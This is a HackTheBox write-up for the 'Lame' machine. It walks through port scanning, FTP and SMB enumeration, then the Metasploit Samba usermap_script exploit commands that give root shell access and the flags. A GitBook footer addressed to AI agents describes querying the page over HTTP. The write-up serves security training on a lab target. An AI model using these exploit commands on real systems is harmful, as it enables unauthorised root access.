> For the complete documentation index, see [llms.txt](https://thamizhiniyancs.gitbook.io/writeups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://thamizhiniyancs.gitbook.io/writeups/hackthebox/tracks/beginner-track/lame.md). # Lame ## Overview Hello everyone, In this writeup we are going to solve Lame from HackTheBox. Link for the machine : Lets Start 🙌 Connect to the HTB server by using the OpenVpn configuration file that’s generated by HTB. \[ [Click Here](https://help.hackthebox.com/en/articles/5185687-introduction-to-lab-access) to learn more about how to connect to vpn and access the boxes. ] After connecting to the vpn service, click on Join Machine to access the machine’s ip. After joining the machine you can see the IP Address of the target machine. *** ## Reconnaissance ### Rustscan First start the reconnaissance by running `rustscan` on the target IP address. Command: `rustscan -a 10.10.10.3 -- -A -Pn`

### Results From the results, we got the following ports and services running: | Port | Service | Version | | ---- | ----------- | -------------------- | | 21 | FTP | vsftpd 2.3.4 | | 22 | SSH | OpenSSH 4.7p1 | | 139 | netbios-ssn | Samba smbd 3.X - 4.X | | 445 | netbios-ssn | Samba smbd 3.X - 4.X | | 3632 | distccd | distccd v1 | *** ## Enumerating FTP First, I started enumerating the FTP service running on Port `21`. From the scan results, we can see that the Anonymous login is allowed for FTP.

So I tried to login as `Anonymous` Command: `ftp 10.10.10.3` username: `Anonymous` Password: `Anonymous`

Found nothing in the FTP anonymous Login. *** ## Enumerating SMB Next I started to enumerate SMB service running on port 139. I used `enum4linux` tool to enumerate. Command: `enum4linux -a 10.10.10.3`

From the response of `enum4linux`, I didn’t found any interesting shares. *** ## Initial Access Next, I searched for exploits for the samba version: `Samba smbd 3.X - 4.X` and found the this version is vulnerable to command execution. {% embed url="" %} To use the above exploit, execute the commands in `msfconsole` as follows: `use exploit/multi/samba/usermap_script` `set RHOSTS 10.10.10.3` `set LHOST tun0` ( Here tun0 is your hackthebox vpn tunnel IP ) `run`

*** ## Getting the User Flag Now we have got access to the target machine as `root`. I searched for the user flag using the following command: command: `find / -name user.txt`

And we have found the user flag. *** ## Getting the Root Flag Now I searched for the root flag using the same method and found the root flag:

We have successfully found all the flags. Thank You !!! --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://thamizhiniyancs.gitbook.io/writeups/hackthebox/tracks/beginner-track/lame.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.